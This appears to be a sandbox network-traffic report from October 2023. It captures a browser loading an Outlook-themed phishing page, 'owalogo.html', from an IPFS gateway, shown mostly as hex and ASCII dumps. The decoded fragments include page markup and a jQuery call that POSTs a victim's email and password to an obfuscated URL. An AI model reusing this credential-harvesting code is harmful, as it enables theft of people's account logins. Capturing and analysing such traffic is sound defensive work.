                                                                                Data Ascii: CA7D938FF51C149753D6F5010DDFABA2EF98D4501504614B516418293910C51A55A5613E09208A4EFB4241AE169AA3213C908C3AF3EB8254062BF8ABBE5838CF1D4F77BE9DB71AC918FF710874B8FD3E93ED261156952B2F0DFE401F4653E97950CC5D783B52C8BDF6118B78E033260EBB2417F6042A8F6B8F40F4F94D06798
                                                                                2023-10-12 15:42:15 UTC167INData Raw: 32 30 32 30 32 30 32 30 32 39 31 41 43 42 45 41 45 39 44 39 31 41 42 37 32 36 39 36 39 36 39 36 39 36 39 36 44 41 33 42 39 42 39 42 46 43 43 30 38 31 41 30 38 43 43 42 46 42 39 42 39 37 37 36 39 36 39 36 39 36 39 42 38 35 39 37 42 41 30 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 39 31 41 43 43 31 42 37 42 37 39 33 41 39 36 42 36 39 36 39 36 39 36 39 36 44 42 32 41 31 43 43 33 30 33 30 34 30 31 39 31 43 31 39 34 30 31 44 31 35 43 43 41 31 38 44 36 39 36 39 36 39 42 38 35 41 37 30 41 30 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 39 31 41 43 43 31 42 36 42 36 41 44 41 32 36 33 36 37 36 37 36 37 36 36 41 33 42 41 31 30 34 30 31 43 31 36 31 36 34 32 34 32 34 32 33 31 30 45 31 33 33 30 31 34
                                                                                Data Ascii: 20202020291ACBEAE9D91AB7269696969696DA3B9B9BFCC081A08CCBFB9B97769696969B8597BA00202020202020202020202020291ACC1B7B793A96B696969696DB2A1CC303040191C19401D15CCA18D696969B85A70A00202020202020202020202020291ACC1B6B6ADA26367676766A3BA10401C1616424242310E133014
                                                                                2023-10-12 15:42:15 UTC183INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 38 43 42 42 39 43 30 30 39 39 43 43 46 46 43 46 45 43 46 35 46 46 41 43 45 36 46 46 46 46 36 43 44 32 46 46 46 46 36 35 43 46 46 43 46 46 34 42 43 31 45 46 46 46 33 30 42 32 45 32 46 46 31 34 41 34 44 36 46 46 30 30 39 39 43 43 46 46 30 30 38 32 41 45 46 33 30 30 36 32 38 33 44 46 30 30 34 38 36 30 43 43 30 30 31 43 32 36 41 46 30 30 30 30 30 30 39 39 30 30 30 30 30 30 38 37 30 30 30 30 30 30 37 33 30 30 30 30 30 30 35 39 30 30 30 30 30 30 33 46 30 30 30 30
                                                                                Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001008CBB9C0099CCFFCFECF5FFACE6FFFF6CD2FFFF65CFFCFF4BC1EFFF30B2E2FF14A4D6FF0099CCFF0082AEF3006283DF004860CC001C26AF000000990000008700000073000000590000003F0000


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.449752209.94.90.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:14 UTC150OUTGET /ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html HTTP/1.1
                                                                                Host: fleek.ipfs.io
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Upgrade-Insecure-Requests: 1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: navigate
                                                                                Sec-Fetch-Dest: document
                                                                                Referer: https://www.miglioremacchinadacucire.it/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9209.94.90.1443192.168.2.449752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:15 UTC199INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Thu, 12 Oct 2023 15:42:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 501042
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Access-Control-Allow-Methods: GET
                                                                                Access-Control-Allow-Methods: HEAD
                                                                                Access-Control-Allow-Methods: OPTIONS
                                                                                Cache-Control: public, max-age=29030400, immutable
                                                                                Etag: "bafkreiaspbaanpdvkr4g2i7xq6cpqry7sn7zfruz7lm5ee3w5wipcidn7i"
                                                                                X-Ipfs-Gateway-Host: ipfs-bank8-sv15
                                                                                X-Ipfs-Path: /ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html
                                                                                X-Ipfs-Roots: bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa,bafkreiaspbaanpdvkr4g2i7xq6cpqry7sn7zfruz7lm5ee3w5wipcidn7i
                                                                                X-IPFS-POP: ipfs-bank8-sv15
                                                                                Timing-Allow-Origin: *
                                                                                X-Ipfs-DataSize: 501042
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Allow-Headers: X-Requested-With, Range, Content-Range, X-Chunked-Output, X-Stream-Output
                                                                                Access-Control-Expose-Headers: Content-Range, X-Chunked-Output, X-Stream-Output
                                                                                X-IPFS-LB-POP: gateway-bank3-sv15
                                                                                X-BFID: 62ca760d99a7278ea2e35513557c9033
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                X-Proxy-Cache: MISS
                                                                                Accept-Ranges: bytes
                                                                                2023-10-12 15:42:15 UTC200INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 31 30 22 20 2f 3e 0d 0a 0d 0a 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 72 65 65 70 6e 67 69 6d 67 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 6d 69 63 72 6f 73 6f 66 74 2f 37 30 36 37 34 2d 6f 75 74 6c 6f 6f 6b 2d 6f 66 66 69 63 65 2d 6f 75 74 6c 6f 6f 6b 2e 63 6f 6d 2d 65 6d 61 69 6c 2d 6c 6f 67 6f 2d 33 36 35 2d 6d 69 63 72 6f 73 6f 66 74 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65
                                                                                Data Ascii: <html><head><meta http-equiv="X-UA-Compatible" content="IE=10" /><link rel="shortcut icon" href="https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.png" type="image/x-icon"><meta http-e
                                                                                2023-10-12 15:42:15 UTC215INData Raw: 78 4c 6a 45 7a 4e 44 63 33 4e 79 77 67 4d 6a 41 78 4d 43 38 77 4d 69 38 78 4d 69 30 78 4e 7a 6f 7a 4d 6a 6f 77 4d 43 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68 68 63 43 38 78 4c 6a 41 76 49 69 42 34 62 57 78 75 63 7a 70 34 62 58 42 4e 54 54 30 69 61 48
                                                                                Data Ascii: xLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaH
                                                                                2023-10-12 15:42:15 UTC231INData Raw: 34 37 4a 36 39 79 57 6d 4a 53 7a 61 42 59 4c 2b 42 4d 6e 56 43 45 64 50 43 39 36 71 37 54 67 71 43 53 4e 41 6d 38 74 73 4a 43 79 43 70 30 72 69 52 56 31 6a 49 78 55 70 61 4d 67 46 76 37 4b 51 75 39 38 62 39 76 58 37 52 7a 62 68 61 6e 72 59 75 54 76 6b 66 49 54 56 74 35 4d 6f 45 59 2f 7a 64 41 41 56 4b 68 46 51 65 66 64 47 70 62 62 45 4a 77 62 5a 54 61 76 6e 59 5a 43 59 4f 54 73 4a 6d 79 49 76 4c 62 70 32 4b 6b 34 57 43 51 6d 4c 6d 34 46 68 68 33 46 46 47 65 4b 2b 64 4d 49 4a 69 77 6e 4f 72 45 70 4c 57 50 49 6a 55 42 52 48 32 38 74 42 33 74 79 7a 49 4d 6e 4d 46 37 74 36 76 43 55 61 4e 70 76 6e 6f 77 58 69 59 52 37 6f 70 31 54 74 51 46 6b 6a 62 41 6c 32 32 4d 36 56 65 77 36 2f 48 35 35 6b 55 61 73 38 33 44 4a 61 50 57 2f 73 43 34 59 64 39 78 6d 33 58 6d 6c
                                                                                Data Ascii: 47J69yWmJSzaBYL+BMnVCEdPC96q7TgqCSNAm8tsJCyCp0riRV1jIxUpaMgFv7KQu98b9vX7RzbhanrYuTvkfITVt5MoEY/zdAAVKhFQefdGpbbEJwbZTavnYZCYOTsJmyIvLbp2Kk4WCQmLm4Fhh3FFGeK+dMIJiwnOrEpLWPIjUBRH28tB3tyzIMnMF7t6vCUaNpvnowXiYR7op1TtQFkjbAl22M6Vew6/H55kUas83DJaPW/sC4Yd9xm3Xml
                                                                                2023-10-12 15:42:15 UTC247INData Raw: 41 3d 3d 27 29 3b 0d 0a 09 09 0d 0a 20 20 20 20 20 20 20 20 24 2e 61 6a 61 78 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 75 72 6c 3a 20 28 64 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 3a 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 3a 65 6d 61 69 6c 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 73 73 77 6f 72 64 3a 70 61 73 73 77 6f 72 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 64 61 74 61 3a 20 24 28 27 23 63 6f 6e 74 61 63 74 27 29 2e 73 65 72 69 61 6c 69 7a 65 28 29 2c 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: A=='); $.ajax({ dataType: 'JSON', url: (d), type: 'POST', data:{ email:email, password:password, }, // data: $('#contact').serialize(),
                                                                                2023-10-12 15:42:15 UTC263INData Raw: 35 35 35 30 32 36 34 46 34 34 39 38 45 42 41 30 44 34 42 35 44 37 32 43 32 44 39 43 36 46 42 37 41 41 36 41 32 46 37 37 35 38 45 35 46 44 43 31 44 32 33 34 36 32 36 31 34 30 38 32 38 41 38 34 34 37 45 44 42 33 36 30 43 39 38 44 43 37 34 45 34 31 31 36 39 43 45 33 38 42 34 45 45 30 33 46 33 35 36 31 42 39 43 38 43 38 42 37 39 42 44 31 31 36 41 32 42 35 44 45 31 43 37 36 44 32 31 43 32 46 34 35 43 38 35 44 42 39 32 37 32 38 32 38 35 32 36 37 36 42 42 37 31 45 39 33 30 34 35 31 35 44 46 46 43 30 31 31 39 30 41 38 44 45 35 42 42 32 31 46 44 30 37 31 37 35 45 46 41 31 33 42 35 34 36 37 32 44 36 37 39 36 34 36 36 38 39 45 37 30 35 41 39 37 39 32 33 45 37 36 38 38 41 45 41 39 42 37 42 39 31 46 42 37 34 31 39 36 44 43 37 45 37 37 32 45 39 41 44 30 43 35 34 30 43
                                                                                Data Ascii: 5550264F4498EBA0D4B5D72C2D9C6FB7AA6A2F7758E5FDC1D234626140828A8447EDB360C98DC74E41169CE38B4EE03F3561B9C8C8B79BD116A2B5DE1C76D21C2F45C85DB927282852676BB71E9304515DFFC01190A8DE5BB21FD07175EFA13B54672D679646689E705A97923E7688AEA9B7B91FB74196DC7E772E9AD0C540C
                                                                                2023-10-12 15:42:15 UTC279INData Raw: 36 35 38 35 32 45 44 45 32 34 30 41 37 32 42 33 35 41 39 37 37 34 35 42 34 45 35 44 36 42 36 34 42 45 41 46 44 46 32 45 46 42 46 33 45 30 39 32 38 36 41 41 39 30 31 33 32 45 36 32 34 34 33 43 38 33 36 41 30 36 45 43 30 33 30 43 41 33 42 34 30 39 45 36 45 41 39 36 44 45 41 37 44 32 43 36 41 46 42 36 35 45 36 30 41 34 42 34 36 46 36 46 30 32 30 44 43 32 35 32 44 33 35 37 30 39 35 30 37 38 42 44 42 45 44 39 41 45 41 36 30 34 30 39 38 31 38 37 39 42 34 42 43 44 34 36 39 32 35 31 34 42 43 37 44 32 45 42 34 34 30 31 46 34 44 46 46 35 30 46 36 37 38 39 37 35 37 44 35 30 42 46 34 42 46 42 35 34 32 45 46 31 36 42 33 39 35 30 45 31 33 46 46 30 34 43 37 31 32 46 45 33 32 35 38 35 38 32 30 42 45 43 38 38 38 31 44 34 37 30 41 33 42 31 33 44 38 34 32 30 31 39 42 38 44
                                                                                Data Ascii: 65852EDE240A72B35A97745B4E5D6B64BEAFDF2EFBF3E09286AA90132E62443C836A06EC030CA3B409E6EA96DEA7D2C6AFB65E60A4B46F6F020DC252D357095078BDBED9AEA6040981879B4BCD4692514BC7D2EB4401F4DFF50F6789757D50BF4BFB542EF16B3950E13FF04C712FE32585820BEC8881D470A3B13D842019B8D
                                                                                2023-10-12 15:42:15 UTC295INData Raw: 36 36 30 41 34 31 38 42 37 43 31 45 45 38 44 38 33 44 38 44 37 45 38 43 38 31 39 36 46 45 39 34 39 41 33 31 39 44 42 38 44 37 38 36 32 32 34 31 42 39 31 46 36 44 41 35 33 46 41 39 36 41 46 42 32 35 43 37 32 35 35 44 42 43 42 39 42 33 35 41 43 44 44 36 30 30 33 33 30 31 41 38 44 38 34 36 33 35 39 38 45 33 34 45 35 44 32 38 45 32 46 36 32 35 42 39 32 43 37 34 31 36 45 34 36 30 42 31 35 37 44 36 42 38 45 38 35 30 42 35 42 36 46 33 34 45 38 45 45 35 32 38 46 31 43 44 46 34 37 44 38 33 31 38 33 43 35 46 44 35 42 30 32 38 38 36 33 34 32 36 35 33 33 33 38 46 36 31 31 34 45 34 33 31 33 43 46 46 34 35 36 31 42 41 38 38 36 46 46 35 41 38 30 46 46 44 45 42 35 38 38 38 37 36 41 46 46 37 38 30 46 43 45 44 43 35 31 42 34 44 30 35 45 42 36 36 44 37 45 38 31 44 32 36 46
                                                                                Data Ascii: 660A418B7C1EE8D83D8D7E8C8196FE949A319DB8D7862241B91F6DA53FA96AFB25C7255DBCB9B35ACDD6003301A8D8463598E34E5D28E2F625B92C7416E460B157D6B8E850B5B6F34E8EE528F1CDF47D83183C5FD5B02886342653338F6114E4313CFF4561BA886FF5A80FFDEB588876AFF780FCEDC51B4D05EB66D7E81D26F
                                                                                2023-10-12 15:42:15 UTC311INData Raw: 33 32 31 36 45 45 38 38 46 46 43 35 37 37 46 37 30 42 30 42 39 46 31 34 32 37 34 30 38 35 45 44 36 35 32 41 35 32 35 38 42 45 36 42 36 35 31 31 42 46 35 45 41 30 35 36 32 36 34 31 46 43 36 42 41 31 30 37 41 37 36 30 38 45 44 39 31 46 33 30 32 30 30 36 43 38 30 41 46 46 37 42 35 35 34 31 43 32 45 31 35 30 37 42 35 30 32 32 37 33 37 44 36 30 39 38 38 35 45 37 43 46 41 35 38 31 34 41 35 43 31 41 30 38 36 31 37 33 45 42 37 35 42 30 44 38 31 41 32 45 46 39 35 38 43 34 32 42 46 31 44 39 43 36 45 42 37 45 45 41 45 41 45 44 41 44 38 37 33 43 43 39 36 30 34 31 41 41 41 33 36 33 37 46 39 31 36 34 45 34 42 30 42 37 31 31 38 30 30 30 45 43 35 30 32 46 42 33 43 31 45 31 38 36 42 34 46 30 39 35 35 31 46 36 45 32 42 37 30 38 34 36 44 31 36 45 33 31 39 45 42 46 31 46 31
                                                                                Data Ascii: 3216EE88FFC577F70B0B9F14274085ED652A5258BE6B6511BF5EA0562641FC6BA107A7608ED91F302006C80AFF7B5541C2E1507B5022737D609885E7CFA5814A5C1A086173EB75B0D81A2EF958C42BF1D9C6EB7EEAEAEDAD873CC96041AAA3637F9164E4B0B7118000EC502FB3C1E186B4F09551F6E2B70846D16E319EBF1F1
                                                                                2023-10-12 15:42:15 UTC327INData Raw: 42 33 31 42 39 45 45 35 35 34 44 33 44 32 38 30 35 37 46 35 34 41 46 42 42 35 34 37 33 30 31 30 35 31 46 33 45 37 34 33 38 32 33 42 38 39 45 35 43 43 37 34 45 39 33 35 33 45 42 42 45 45 41 30 30 41 36 39 44 45 35 32 43 42 38 35 30 43 37 30 37 44 44 36 34 45 43 37 35 31 41 32 36 42 41 36 34 30 35 43 31 33 38 38 39 32 41 36 46 44 46 44 45 44 31 38 37 36 35 43 42 42 41 38 33 36 31 32 43 46 46 30 37 36 35 36 32 34 35 43 33 44 39 39 31 39 36 34 34 44 44 32 38 36 30 34 37 36 36 42 33 36 38 34 33 44 37 43 35 32 31 30 35 31 44 42 44 43 30 43 46 36 45 45 39 37 41 41 46 35 38 31 32 31 41 46 34 43 33 39 31 46 36 30 43 45 41 36 37 46 43 37 32 37 43 32 42 35 46 34 39 31 36 43 34 46 38 42 41 31 31 44 45 46 32 34 42 34 34 30 36 37 43 38 38 30 39 46 39 36 37 38 30 33 36
                                                                                Data Ascii: B31B9EE554D3D28057F54AFBB547301051F3E743823B89E5CC74E9353EBBEEA00A69DE52CB850C707DD64EC751A26BA6405C138892A6FDFDED18765CBBA83612CFF07656245C3D9919644DD28604766B36843D7C521051DBDC0CF6EE97AAF58121AF4C391F60CEA67FC727C2B5F4916C4F8BA11DEF24B44067C8809F9678036
                                                                                2023-10-12 15:42:15 UTC343INData Raw: 45 33 45 31 43 34 38 46 35 38 30 35 36 33 41 31 35 33 43 32 41 31 45 36 33 36 31 42 37 38 42 34 46 32 32 41 32 45 32 43 34 32 34 34 41 34 33 32 44 43 39 35 32 34 43 33 41 38 42 43 31 30 46 38 43 41 43 41 37 34 38 46 46 31 41 43 31 36 42 42 45 39 30 46 46 42 37 41 32 46 46 36 31 35 36 42 37 32 32 44 34 36 33 31 30 42 33 39 45 33 35 33 35 37 34 33 46 33 38 41 33 38 35 46 33 35 39 33 34 43 42 42 43 36 30 39 42 34 32 39 44 33 43 31 34 31 44 39 43 38 31 42 43 34 45 41 32 43 39 43 43 46 36 30 30 43 39 31 30 44 43 46 33 30 30 42 42 36 38 39 30 38 30 31 43 46 41 39 37 35 38 39 33 38 35 32 33 33 37 33 43 35 34 33 31 43 30 43 42 46 41 32 37 44 44 42 31 41 32 38 45 33 35 35 38 33 34 46 38 45 39 46 43 45 30 41 42 44 45 31 33 41 45 32 43 38 44 37 42 34 44 38 41 36 43
                                                                                Data Ascii: E3E1C48F580563A153C2A1E6361B78B4F22A2E2C4244A432DC9524C3A8BC10F8CACA748FF1AC16BBE90FFB7A2FF6156B722D46310B39E3535743F38A385F35934CBBC609B429D3C141D9C81BC4EA2C9CCF600C910DCF300BB6890801CFA9758938523373C5431C0CBFA27DDB1A28E355834F8E9FCE0ABDE13AE2C8D7B4D8A6C
                                                                                2023-10-12 15:42:15 UTC359INData Raw: 36 41 30 35 33 32 44 34 37 45 41 35 46 31 44 38 39 43 32 32 30 32 32 41 39 34 33 41 32 32 45 44 42 34 35 30 43 43 36 33 31 34 38 43 34 33 35 30 43 37 41 38 41 44 44 31 45 30 33 39 38 30 36 34 44 44 33 39 46 44 31 35 43 43 30 44 42 36 44 44 33 43 42 37 45 46 43 42 45 32 42 37 41 46 34 35 38 34 46 30 33 43 41 35 46 37 35 31 32 37 46 38 42 43 32 36 32 38 39 37 39 42 46 44 32 36 46 36 37 33 37 46 42 43 38 38 45 32 31 44 45 30 41 38 38 35 38 35 35 31 39 46 32 35 43 43 32 45 30 38 34 41 41 46 46 30 36 30 35 42 33 31 36 36 33 34 34 45 30 33 41 36 36 32 39 43 42 35 46 46 30 38 41 35 44 31 44 43 44 35 35 36 46 45 45 44 38 31 31 36 33 37 31 31 38 44 46 31 33 31 42 46 31 44 30 46 30 38 32 39 41 32 42 35 32 43 45 32 44 34 38 32 33 31 35 44 31 41 42 41 46 39 33 45 33
                                                                                Data Ascii: 6A0532D47EA5F1D89C22022A943A22EDB450CC63148C4350C7A8ADD1E0398064DD39FD15CC0DB6DD3CB7EFCBE2B7AF4584F03CA5F75127F8BC2628979BFD26F6737FBC88E21DE0A88585519F25CC2E084AAFF0605B3166344E03A6629CB5FF08A5D1DCD556FEED811637118DF131BF1D0F0829A2B52CE2D482315D1ABAF93E3
                                                                                2023-10-12 15:42:15 UTC375INData Raw: 32 38 32 42 45 39 35 35 33 33 39 37 35 32 37 35 34 31 33 39 35 36 42 45 30 43 43 30 39 39 32 34 36 42 36 38 46 32 37 30 37 30 36 46 46 31 41 37 33 43 42 30 41 42 37 37 31 31 38 37 30 43 38 39 31 33 34 46 38 46 45 42 34 34 43 41 38 36 31 35 34 46 44 33 31 33 35 46 30 30 30 30 44 34 32 44 45 37 33 43 30 30 42 37 32 38 43 36 41 37 42 43 46 38 42 36 45 46 36 41 34 37 42 30 43 45 43 45 34 41 31 38 36 39 43 38 37 35 42 33 44 41 33 42 38 45 42 32 44 39 43 33 34 44 46 35 31 45 38 31 38 37 41 30 34 32 31 45 46 39 41 43 36 30 45 32 31 37 45 31 33 31 44 46 32 46 41 37 32 37 31 44 36 31 31 34 36 39 31 46 32 32 33 30 31 41 39 42 43 30 34 30 46 43 46 32 36 33 34 36 35 46 46 30 37 34 43 31 42 35 33 38 34 41 43 33 38 37 33 35 34 39 37 31 33 31 43 42 32 35 34 31 32 32 43
                                                                                Data Ascii: 282BE95533975275413956BE0CC099246B68F270706FF1A73CB0AB7711870C89134F8FEB44CA86154FD3135F0000D42DE73C00B728C6A7BCF8B6EF6A47B0CECE4A1869C875B3DA3B8EB2D9C34DF51E8187A0421EF9AC60E217E131DF2FA7271D6114691F22301A9BC040FCF263465FF074C1B5384AC38735497131CB254122C
                                                                                2023-10-12 15:42:15 UTC391INData Raw: 46 46 37 31 30 38 37 34 42 38 46 44 33 45 39 33 45 44 32 36 31 31 35 36 39 35 32 42 32 46 30 44 46 45 34 30 31 46 34 36 35 33 45 39 37 39 35 30 43 43 35 44 37 38 33 42 35 32 43 38 42 44 46 36 31 31 38 42 37 38 45 30 33 33 32 36 30 45 42 42 32 34 31 37 46 36 30 34 32 41 38 46 36 42 38 46 34 30 46 34 46 39 34 44 30 36 37 39 38 31 43 34 37 37 38 33 38 46 45 31 30 34 37 31 45 39 41 37 37 30 38 36 45 41 38 36 34 43 34 41 46 30 44 30 39 32 31 35 37 36 38 38 42 36 45 31 37 43 35 44 46 37 39 46 41 42 32 31 31 33 32 33 30 45 36 39 43 34 36 33 44 30 38 34 46 43 34 34 46 46 30 44 31 44 31 39 38 30 41 46 45 41 33 43 41 31 34 30 31 36 37 39 31 38 36 35 37 36 34 39 42 38 45 35 33 31 30 35 41 37 38 44 38 44 35 37 30 35 30 44 31 42 30 45 44 36 35 32 32 31 32 32 45 37 33
                                                                                Data Ascii: FF710874B8FD3E93ED261156952B2F0DFE401F4653E97950CC5D783B52C8BDF6118B78E033260EBB2417F6042A8F6B8F40F4F94D067981C477838FE10471E9A77086EA864C4AF0D092157688B6E17C5DF79FAB2113230E69C463D084FC44FF0D1D1980AFEA3CA140167918657649B8E53105A78D8D57050D1B0ED6522122E73
                                                                                2023-10-12 15:42:15 UTC407INData Raw: 43 31 39 34 30 31 44 31 35 43 43 41 31 38 44 36 39 36 39 36 39 42 38 35 41 37 30 41 30 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 39 31 41 43 43 31 42 36 42 36 41 44 41 32 36 33 36 37 36 37 36 37 36 36 41 33 42 41 31 30 34 30 31 43 31 36 31 36 34 32 34 32 34 32 33 31 30 45 31 33 33 30 31 34 42 41 37 38 36 37 36 37 42 38 35 42 35 42 38 31 41 30 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 39 31 38 36 43 31 41 46 41 46 42 37 39 35 30 31 35 41 36 34 36 34 37 38 41 34 31 38 31 42 34 44 35 30 35 30 35 30 34 44 34 31 31 36 34 32 31 33 30 45 33 32 31 43 31 34 41 34 36 37 36 34 42 38 35 43 35 43 37 33 39 38 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 39 31 42 31 42 45 42 43
                                                                                Data Ascii: C19401D15CCA18D696969B85A70A00202020202020202020202020291ACC1B6B6ADA26367676766A3BA10401C1616424242310E133014BA786767B85B5B81A00202020202020202020202029186C1AFAFB795015A646478A4181B4D5050504D411642130E321C14A46764B85C5C739802020202020202020202020291B1BEBC
                                                                                2023-10-12 15:42:15 UTC423INData Raw: 46 34 42 43 31 45 46 46 46 33 30 42 32 45 32 46 46 31 34 41 34 44 36 46 46 30 30 39 39 43 43 46 46 30 30 38 32 41 45 46 33 30 30 36 32 38 33 44 46 30 30 34 38 36 30 43 43 30 30 31 43 32 36 41 46 30 30 30 30 30 30 39 39 30 30 30 30 30 30 38 37 30 30 30 30 30 30 37 33 30 30 30 30 30 30 35 39 30 30 30 30 30 30 33 46 30 30 30 30 30 30 32 42 30 30 30 30 30 30 31 46 30 30 30 30 30 30 31 35 30 30 30 30 30 30 30 42 30 30 30 30 30 30 30 33 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                Data Ascii: F4BC1EFFF30B2E2FF14A4D6FF0099CCFF0082AEF3006283DF004860CC001C26AF000000990000008700000073000000590000003F0000002B0000001F000000150000000B0000000300000001000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                                                2023-10-12 15:42:15 UTC439INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
